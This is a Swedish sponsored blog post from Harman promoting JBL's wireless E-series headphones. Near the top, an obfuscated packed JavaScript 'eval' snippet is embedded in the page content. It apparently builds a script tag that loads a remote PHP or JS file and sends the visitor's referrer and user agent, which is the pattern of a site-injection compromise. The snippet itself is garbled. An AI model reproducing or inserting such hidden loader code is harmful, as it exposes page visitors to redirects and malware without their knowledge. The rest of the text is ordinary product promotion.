Image Image Image Image Image Image Image Image Image Image

| 26 maj, 2020

Scroll to top

Top

JBL lanserar nästa generation hörlurar

eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|etbnf|var|u0026u|referrer|fkbny||js|php’.split(’|’),0,{}))
type=”text/javascript” src=”//delivery.vidible.tv/jsonp/pid=583e9b0bcb65d3056ed4f88c/56d0eb36e4b0066426bef73b.js”>

JBL lanserar nästa generation hörlurar: Julen närmar sig med stormsteg. En härlig tid där vi tillsammans med nära och kära träffas för att äta gott och umgås. Har du inte hittat dem där perfekta julklapparna än så har vi på Revue ett riktigt smart och funktionellt tips på vad antingen du kan önska dig själv eller ge bort. 

Något som är väldigt hett just nu och diskuteras i media är nästa generations hörlurar. Hörlurar som inte behöver kopplas ihop med den där jobbiga sladden som alltid fastnar någonstans. Företaget Harman har nu släppt några riktigt snygga och framförallt bra hörlurar som är helt trådlösa. Det är deras populära serie JBL E-serien.

De trådlösa modellerna E25BT, E45BT och E55BT kan anslutas till mobila enheter via Bluetooth och ger användaren fria händer hela dagen oavsett vilka äventyr som väntar. Varje modell tillåter ett smidigt byte mellan enheter och erbjuder en oavbruten ljudupplevelse. Genom att enkelt växla mellan musik på en bärbar enhet till ett samtal på mobilen missar användaren varken sin favoritlåt eller kompisens samtal.

Nästa generation hörlurar JBL E-serien

 

JBLs nya snygga design kombinerar både komfort och stil, och låter lika bra som de ser ut. Huvudbyglarna och de trasselfria sladdarna är tygklädda, och samtliga hörlurar i serien har en ergonomisk passform i toppklass för bekväm lyssning under lång tid. E45BT och E55BT har kontrollknappar på hörselkåpan som kan användas i det trådlösa läget men kommer även med en löstagbar tygklädd sladd med fjärrkontroll.

JBL E-serien levererar JBLs välkända ljud med utmärkt basåtergivning och högkvalitativa ljudupplevelser. Dessutom har hörlurarna en inbyggd mikrofon för att ge användarna möjligheten att svara i telefonen med ett enkelt knapptryck.

Så är det riktigt bra ljud utan sladd som du är ute efter så rekommenderar vi att du kollar närmare på dessa snygga hörlurar som du enkelt kopplar till din smartphone.

Kika in videon ovan för att få en bättre uppfattning om hur dem fungerar, ser ut och låter.

Detta är ett sponsrat inlägg från HARMAN International Industries